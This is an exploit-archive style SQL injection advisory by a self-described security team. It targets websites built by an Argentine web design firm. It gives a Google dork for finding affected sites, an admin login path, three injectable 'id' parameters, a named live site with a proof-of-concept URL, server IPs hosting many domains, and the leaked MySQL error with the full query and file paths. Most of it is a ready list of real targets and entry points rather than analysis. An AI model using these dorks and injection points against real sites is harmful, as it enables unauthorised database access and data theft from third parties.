################################################################
# Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : losgrobo.com ~ grupolosgrobo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Grupo LosGrobo'' site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html
################################################################
# Admin Panel Login Path :
/reportesUPJ/index.aspx
# SQL Injection Exploit :
/novedades.php?id=[SQL Injection]
/mercado.php?id=[SQL Injection]
/rse_notas.php?id=[SQL Injection]
################################################################
# Example Vulnerable Site =>
Note : (192.185.3.54) => There are 106 domains hosted on this server.
Note : (192.185.30.132) => There are 63 domains hosted on this server.
[+] upj.com.ar/novedades.php?id=719%27 =>
[ Proof of Concept ] => archive.fo/2kEkb
################################################################
# SQL Database Error :
Warning: session_start() [function.session-start]: Cannot send session cookie -
headers already sent by (output started at /home/upjcom/public_html/novedades.php:5)
in /home/upjcom/public_html/novedades_include.php on line 2
Warning: session_start() [function.session-start]: Cannot send session cache limiter -
headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in
/home/upjcom/public_html/novedades_include.php on line 2
Consulta no vlida: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'' and state=1 order by created desc LIMIT 0,5' at line 1
Consulta completa: SELECT id, date_format(created,) AS fecha ,
title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1
order by created desc LIMIT 0,5
################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
################################################################